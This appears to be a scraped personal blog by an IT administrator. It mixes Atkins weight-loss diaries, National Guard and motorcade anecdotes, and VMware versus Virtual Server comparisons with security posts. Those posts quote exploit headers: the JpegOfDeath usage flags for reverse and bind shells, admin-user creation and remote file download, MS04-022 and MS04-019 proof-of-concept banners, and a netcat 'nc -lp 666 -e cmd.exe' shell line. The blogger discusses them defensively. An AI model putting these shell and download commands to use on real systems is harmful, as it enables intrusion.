First, I made my weightloss goal last weekend. I finally feel like a confirmed weight loss success story being down 190 pounds on Atkins, and over 205 pounds overall. It might have taken me 15 months to do it, but it was worth hard work and perserverence to get there. I have uploaded a few of the milestone photos to my Photoblog, which I promise to update soon, and a few more new here at Atkins Diet Bulletin Board photo gallery. I have posted my success story in multiple places and was even on WOI-TV nightly newscast. I am not needless to say polished in front of the camera, but a number of friends saw it.

That brings up the next change. As I mentioned in my last blog entry, I rejoined the Iowa National Guard as an intel analyst (96b). I had my first drill back, and it is funny how much some things change (the whole black beret business, which I personally hate -- give me a soft cap any day) and how some things stay the same (weapons and pro- mask cleaning). I am determined to at least stay positive and even if I end after one year, it will be on my terms (PT test passed and not on the fat boys squad). I am getting close to being able to pass the Army PT test without any question. My 2 mile run is still about 15 seconds from passing (17:37) at my age group.

Work has been extremely busy as my current resume can attest. We have lost a few resources either by design or by their choice, which have left the remaining team members extra busy. Our VMware ESX server deployment and hardware server consolidation is progressing by leaps and bounds with currently 40 virtualized servers on our 4 ESX servers. I am pushing to attend VMWorld 2005 this year. We are also in the midst of completing both NT4 remaining member server upgrade project and the Active Directory upgrade project. It is amazing how some mission critical boxes can be so ignored by management for so long. The AD project is an interesting one, which required Netware upgrade to version 6.5 for DNS and iManager upgrades, implementation of NMAS Universal Passwords, and NSure Identity Manager (DirXML) 2 to replace Novell Account Management.

Here is the current photo:

There will be new ones with uniforms in near future.

Having another training vacation with my dear spouse seems hard to believe, but if it has come at the company's expense, all the better. TechEd server track should be as informative as the Brainshare 2004 ones. Needless to say, it should be an interesting comparison from last year.

* committed to using Fitday again. (Can't go by habit anymore I guess)
* dropping my flavored water habit (had at one point drank 64oz per day in addition to the 60-100 oz of regular) I am going back to 140 oz of regular water per day.
* Keeping the exercise level high - Cardio (from 3 times to 4 times/week) and weight lifting (still doing 2- 3 day cycles of weights).
* Final one is I am going to attempt to stop stressing about the weight. I am starting to let myself go hungry at night in an effort to see a positive scale result in the morning. I am also re-committing myself to thanking God each morning for whatever the result is on the scale and for the progess I have had so far.

I have gotten out of touch with what has generated 138 (re: 134 today) of weight loss, and the positive feeling about my weight loss. I get more comments today than ever, but they ring hollow when the scale is not as responsive. I will probably bring out the other friend (Mr Tape Measure) later and get alternative one done. A little early, I usually tape once a month and it is too soon in January to be doing it.

Price: $500-1000 for Virtual Server, as opposed to $3800 for 4 Proc VMWare box. One thing these numbers do not highlight is the necessity to buy the Host OS in the Virtual Server example. Adding $1580 for a Windows 2003 Enterprise Edition server CAL brings the difference closer. A closer match would be the VMWare GSX (its direct competitor), which weighs in at $2379 at CDW.

Playing the Support game: "We only support virtual guest OS'es under our virtual server software, but we do not under VMWare" is a bit disingenuous and beneficial to Microsoft. On that same note, VMWare does work hand in hand with Microsoft just as IBM does if we had an issue on IBM hardware. A possible mitigation factor would be a dissimilar hardware restore to rule out VMWare being an issue when the call to Microsoft was made. A simple reminder: I believe we had two calls to Microsoft support this past year on two mission critical servers, and we can't remember the last time we called Microsoft on test or development server, which is our current candidate for virtual servers. Major OEM's, like Dell and IBM, have teamed with VMWare to provide that software support as well.

SMP support- Virtual Server does not support Symmetric Multi-Processing (2 CPU's) on the guest OS side. This is a huge negative in my opinion as we go forward. How are we supposed to emulate a production environment that has multiprocessors on a VM that can only handle one to the guest OS?

Performance: Due to the presence of a host OS and everything running within that host OS, the performance on the Virtual Server is only 75-80% according to Microsoft. VMWare ESX2 runs within its own kernel (i.e. no Host OS to impact performance numbers), and its performance is near physical server. (92% is the number we had in class in web server get retrieves and disk performance testing.) Adding to the performance numbers is the ability to run a greater number of VM's at the same time due to how it uses memory for the VM's. Even though Microsoft doubts the capabilities (probably because they can't do it yet), it would allow for a greater (over allocation) of memory with proven technology.

Software maturity: While Microsoft protests to contrary, this is a public 1.0 product. It has never been deployed outside Connectix and Microsoft for more than a month, and while I have high regard for their testing procedures. 1.0 product releases to enterprise customers scare me more than anything. Other products, like their Physical 2 Virtual product, are even less mature and have not even been released yet. Their preview release in their words was not even the final RTM product, so here is one bleeding age product that I would be slower to deploy.

Networking - Not relevant for right now, but the VMware has been strenuously tested by ICSA (the firewall testing org) and was approved by them to be used as enterprise firewall.

Training - Having most of the team trained already on their workstation products and myself being trained on ESX 2, I believe the VMWare product has a definite advantage in that department.

This is just only on the service evaluation so far without personal knowledge of the final copy (which hasn't officially been released yet) of Virtual Server or the ESX2 (not workstation) product outside of training. I am certainly willing to try both products and make a more informed decision based upon actual in-house data and first hand knowledge of both products. I also failed to mention many of the other benefits (scripted OS installs, 64 bit CPU support, support for VLANs) that Virtual Server does not have at this point. I just wanted to make sure I avoided any misconceptions of what I had said or heard today.

*
* Exploit Name:
* =============
* JpegOfDeath.M.c v0.6.a All in one Bind/Reverse/Admin/FileDownload
* =============
* Tweaked Exploit By M4Z3R For GSO
* All Credits & Greetings Go To:
* ==========
* FoToZ, Nick DeBaggis, MicroSoft, Anthony Rocha, #romhack
* Peter Winter-Smith, IsolationX, YpCat, Aria Giovanni,
* Nick Fitzgerald, Adam Nance (where are you?),
* Santa Barbara, Jenna Jameson, John Kerry, so1o,
* Computer Security Industry, Rom Hackers, My chihuahuas
* (Rocky, Sailor, and Penny)...
* ===========
* Flags Usage:
* -a: Add User X with Pass X to Admin Group;
* IE: Exploit.exe -a pic.jpg
* -d: Download a File From an HTTP Server;
* IE: Exploit.exe -d http://YourWebServer/Patch.exe pic.jpg
* -r: Send Back a Shell To a Specified IP on a Specific Port;
* IE: Exploit.exe -r 192.168.0.1 -p 123 pic.jpg (Default Port is 1337)
* -b: Bind a Shell on The Exploited Machine On a Specific Port;
* IE: Exploit.exe -b -p 132 pic.jpg (Default Port is 1337)

Already the worm we saw enter our network yesteday due to Trend Micro's slow virus signature release time included going out to a website to find a ws.jpg. The worm (W32/Bagle.az@MM or WORM_BAGLE.AM depending who you talk to) got while the virus signature was still in "controlled" release, which means you have to manually download it rather than specifically getting automatically. Norton does the same thing, but the delay is a killer. Suddenly, you have to break with normal procedures to maintain up-to-the-minute protection. Trend at 5 pm was still ranking this worm as low and no in the wild distributions -- how wrong they were. NAI was much further ahead of the game than was Trend this time.

As for the exploit, it still looks like a means to an end. A beachfront exploit or a way into your network, not a worm-able product by itself. Plus why would you need this exploit when you still have ID10T users who open things like price.exe or joke.exe in an e-mail?

The Pros and Cons of Tape Backup Solutions (NetWare)

Rick D. wrote: How about a "thread" on Tape backup solutions? I would be very interested to find out what other "Admins" out there are using. Come see what we've got so far, and add your two bits.

We are in the midst of a major Commvault rollout.  It certainly has been an interesting experience migrating from a backup solution, Tivoli Storage Manager, which backed up flawlessly but restored horribly (one server restore involved hundreds perhaps thousands of tapes).  It also barely supported Netware and hardly supported netware clustering or the cluster API's.  Its Windows support was fine, but it certainly had issues doing disparate hardware recovery -- involving multiple Windows OS installs to fix the hardware issues.  It was hardly the ideal solution for an enterprise Novell customer.

We are converting to CommVault Galaxy 5.0, which is admittedly a Windows solution that "supports" Netware.   There have been a number of recent updates to begin making the product palatable in a clustered environment.  Prior to SP3, you could not even unload and reload the clustering nlm's without abending the server.  I have become on a first name basis with the Netware support individuals for Commvault so frequent have my calls been to them.  At this point, we have brought close 30 some virtual and physical Netware servers and about 100 Windows servers into the environment, but every day we still encounter roadblocks as we attempt to implement new and different scenarios.

Despite having two clustered environments already within Commvault and the stripes across our backs to prove -- one involving justifying the beta TSAUP15.exe install to get the software to backup more than one clustered resource on each node, we succeeded in bringing down our data clusters for the first time in years.  The Commvault software hung the servers with such verocity and refused to unload that the only alternative was a just-prior-to-all-user-login reboot.  The thing about Commvault is their big belief on patching - almost more than Microsoft.  Unfortunately, we have already encountered Media Agent patches that succeeded in bringing down most agent backup operations.  Any change or patches in our environment require testing and change management procedure, so their inadequate testing leaves us only applying the patches recommended specifically by support engineer, which means we had just encountered a problem. 

Not a very proactive system right now...

We drove home late last night after a busy day at the aquatic center, visiting relatives, and rousing game of Monopoly. With it being so late, my wife was sure she had to stay awake and keep me company for the 4 hour drive home. Some of the topics were of course Atkins, my brother's loss on Atkins, and how my inlaws' house has not adjusted to my being on Atkins yet. (They still have case after case of Diet Dew in basement, as my wife says, "because you scared her never to be caught without it." Alright I admit it I was not a happy camper when out of DD)

In our discussions over this WOE, she made the comment during the first month of Atkins she really thought we were going to break up. "I thought you fell out of love with me. You were so moody. ... You wouldn't even hold my hand on the way to the airport to Vegas." She hated Atkins for what it was doing my and our happiness together. The 18 pounds (at that point) was not worth the strife.

In her mind the turning point was our trip to Vegas. She thought a lot of the moodiness went away at that point. I was absolutely flabbergasted or as Richt would say "gobsmacked." I knew I had been irritable and hating my choices and some of things I had lost, but I had nover heard these feelings from Laura yet. At the time, it seemed I couldn't just do anything. Everything seemed to be a chore -- I couldn't just glide by. Amazing what having to give up frozen pizza and diet dew will mess with one's attitude on life. My first post seems to betray none of that moodiness, but I certainly remember it well. I was certainly not however contemplating my wife's efficacy as a mate or questioning my love to her.

I apologized for whatever impressions or outward appearance I might have had during the dark weeks. (When all else fails, apologize to your wife unlike the current "Thank you" Citibank ads Smile.) This is the real reason for the post - I am sure my wife had no idea what really induction flu moodiness looked like. Forewarn spouses of the irritability is not their fault and if necessary just keep their distance to avoid hurt feelings. I believe if she had known it was going to be over soon he attitude might have been different. but I can see how a perceived lifetime of moodiness would seem well unattractive. Note: my moodiness did not last the normal 3 of 4 days either -- closer to 3 or 4 weeks, so bear that in mind as well. It was perhaps less Induction flu-related than accomodating a new lifestyle and all the behavorial changes that it mandated.

My wife and I are much happier now as my recent posts hopefully have demonstrated, and my outlook has certainly brightened. My wife hates Atkins much less than before except for the loss of Chinese food and some of the other former restaurant hangouts. I have been rather stubborn (in the same vein of the current "I'm selfish" thread) in my refusal to go to them. We just had a reoccurance this weekend with the two Atkineers (my brother and I) refusing to go out to the local Chinese buffet with the rest of our families insisting it was ok. I have no good compromise other than sending her out by herself during the day while the kids are in school. At this point, why tempt fate with Sesame Chicken. In the end the Atkineers won out and we went to somewhere more acceptable instead.

Just be aware how doing the Atkins WOE affects those around you, and if they mean that much to you, alert them to what making this decision will mean to them. At least then you can get their buyoff ahead of time instead of after the fight is over. A SO who cares for your well being would have a hard time saying "no, I want to stay overweight" after reading the book.

I completed my service today after 8 hours. It was different from last time - namely the security was much much higher than for the Vice President. Last time, I had the feeling we were part of the scenery, and there wasn't much that raised the secret service attention. We posed next to the armored limo, and pretty much acted as people on a special field trip albeit with jobs occassionally to do. This time we were there to do a job, and if we left our post, the car it raised attention. This is not altogether bad, considering who were assisting, I only mention that to give accurate accounting of the day. I had a good day, but it was tiring day of work.

Here's some highlights:
* Things to never photograph under penalty of the secret service telling you to knock it off, which happened so to speak. You can photograph the car and pretty much make a tourist out of yourself around the car; however, NEVER photograph the width of the door. I can understand why -- safety of the occupant vs. someone designing a weapon to punch through that much armor!! --, but it did startle me at the time. I was like "don't shoot, I will put away the camera" in my head, but the secret service man quickly apologized for being startled and reacting as such. The second thing someone else got yelled at for not photograph was the inside of the "Darth Vader" van due to the dome. I should have photos of the outside posted soon.

* Sometimes being on the inside of the event (behind the scenes) is not as good being on the outside (being entertained). Due to the farm implements, we could barely hear the speech. When I asked the press secretary or their assistant if anything new was said. She replied, "he has been on the same topics for months." I took that to mean he hasn't had to change his tune lately. The crowd (looked to be in the thousands packed in this area) was having a great time and was really into what they were hearing.

* Being on Atkins is difficult on days like this. I have read on ADBB -- "failing to plan is planning to fail," so I tried by loading my pack with 4 beef sticks. However, the plan for water fell through. The bright point was the box lunch they provided us drivers -- carb central with buns, candy bars, and a apple -- I was able to eat just the Roast Beef and onions out of the bun. I did wolf down probably too much when I got home, but I stayed cheat-free during the day.

* One more humorous story is when I was merging on the highway I looked over my shoulder to check for oncoming traffic. (Remember that last time we had cars and RV's trying to merge into the motorcade due to insufficient cop coverage) The press secretary reminded me "you don't have to do that in a motorcade." I said I certainly had to with the VP; she laughed said you're with the President this time and that would never happen. I didn't have the heart to remind her of the story (I was told earlier in the day) of the women YESTERDAY in New Hampshire that ran her car into the motorcade after "being overcome with emotion" and then jumped upon by secret service and cops.

About the flag disntegrating - it was a pretty windy day in the country. I would imagine more so on top of a silo. Here's tidbit I didn't know last night when I posted. The guy, who owns the silos in the photos is a friend of a friend, apparently the secret service asked the guy to demolish one of his silos. They thought a sniper might be able to roost up there. Demolish a silo?? It might not have been "in use" at the moment, but a little overkill to demolish them.

One funny story was the Democrats were supposed gather a mile long protest gathering just outside the airports gates. It ended up only being about 100 yards of thinly-stretched people with Kerry-Edwards signs and export tires not jobs (Firestone people). The funniest was a farmer who had people dressed up as corn and cows with signs like "Where is the Beef from? Bush" or "Why do you hate me, McCain?" Why does McCain hate corn? The world may never know...

The protesters were definitely the exception (a couple congregations) not the rule (10,000+ people).

I found out on Monday that I would indeed be in the motorcade, but would need to purchase a new sportcoat. I used to have closet of suits from when I was working for First Dakota National Bank, but two residence moves ago gave them away because when would I ever be 2XLT again. Unfortunately, now I am -- at least a 52PL. I had hoped to put off til I reached a more permanent size. On being Portly, that has to be the second label to put on someone clothes shopping - second only to labelling your kid "Husky." I have dropped 8 or 10 sizes and was somewhat encouraged by the nearness of normal store shopping. However, spending $150 somewhat offended my Dutch frugality. I am told it can be taken in another 6-8" along the sides, but am cautous to put my hope that the sportcoat will look good afterwards.

You might laugh at my evangelism, but I actually had a conversation with the Navy chief corpsman that travels with the Vice President about the Atkins diet on the way back from the event. As we were pulling up to the airport, they started commenting on diets and high protein diets. (How bad they were, blah, blah) I spoke up saying I had been on Atkins diet, and it was certainly working for me. The women in back started talking about something else, but the nurse and I continued talking about the diet. He could barely believe the 80 pound loss in 4 months. I might have even changed his mind about the "all meat" (his words) WOE. A little evangelism is never a bad thing, right?

I will tell my personal favorite story of the day besides shaking the Vice President's hand and watching him play with his grandkids as he shooed them up the ramp of the steps. In these political things they drop balloons and confetti from the rafters - no big deal, everyone has seen it. Well we were getting ushered in to the vehicles, the speech had just ended and the family and staff were piling into the vans. The VP was doing the hand line thing for a few minutes. Anyhow, one of the Secret Service men brough balloons out for 2 of the grandkids. Being a dad, I know what fun it can be when kids miss out on their balloons, so when one of the balloons got away (really windy), I thought I was going to hear some crying. The balloon however floated almost directly my way about 8 feet in the air. I jumped up and grabbed the balloon, and got to hand the balloon to the grandkids. Being a guy who never was accused of being "Air" anything, I believe I might have had a bit of hang time. Don't think I could have made the catch again if I tried or had the wind blow the balloon my way any better.

I will post some photos from the Motorcade on the Photoblog.

//************************************************************* // Microsoft Windows 2K/XP Task Scheduler Vulnerability (MS04-022) // Proof-of-Concept Exploit for English WinXP SP1 // 15 Jul 2004 // // Running this will create a file "j.job". When explorer.exe or any // file-open dialog box accesses the directory containing this file, // notepad.exe will be spawn. // // Greetz: snooq, sk and all guys at SIG^2 www security org sg // //*************************************************************

** [Crpt] Utility Manager exploit v2.666 modified by kralor [Crpt] ** ******************************************************************************************* ** It gets system language and sets windows names to work on any win2k :P ** ** Feel free to add other languages :) ** ** v2.666: added autonomous (allinone) remote exploitation system ;) ** ** It can be executed through poor cmd.exe shells (like nc -lp 666 -e cmd.exe from a ** ** normal user account). Must be called with an argument (any argument) ** ** You know where we are.. ** *****C*****O*****R*****O******M******P*****U*******T*******E******R*****2***0***0***4**** ******************************************************************************************/ /* original disclaimer */ //by Cesar Cerrudo sqlsec>atWell not an exploit that would cause a lot of damage by itself only providing for security elevation. It is still valid to note it could be combined with another, but highly unlikely since there are other easier ways to get system level elevation to a Windows box.

]]> 349@http://www.network-admin.net/ K-OTik : Windows 2000 Utility Manager all in one Exploit (MS04-019)

** [Crpt] Utility Manager exploit v2.666 modified by kralor [Crpt] ** ******************************************************************************************* ** It gets system language and sets windows names to work on any win2k :P ** ** Feel free to add other languages :) ** ** v2.666: added autonomous (allinone) remote exploitation system ;) ** ** It can be executed through poor cmd.exe shells (like nc -lp 666 -e cmd.exe from a ** ** normal user account). Must be called with an argument (any argument) ** ** You know where we are.. ** *****C*****O*****R*****O******M******P*****U*******T*******E******R*****2***0***0***4**** ******************************************************************************************/ /* original disclaimer */ //by Cesar Cerrudo sqlsec>atWell not an exploit that would cause a lot of damage by itself only providing for security elevation. It is still valid to note it could be combined with another, but highly unlikely since there are other easier ways to get system level elevation to a Windows box.

]]> Infosec 2004-07-20T07:06:14-06:00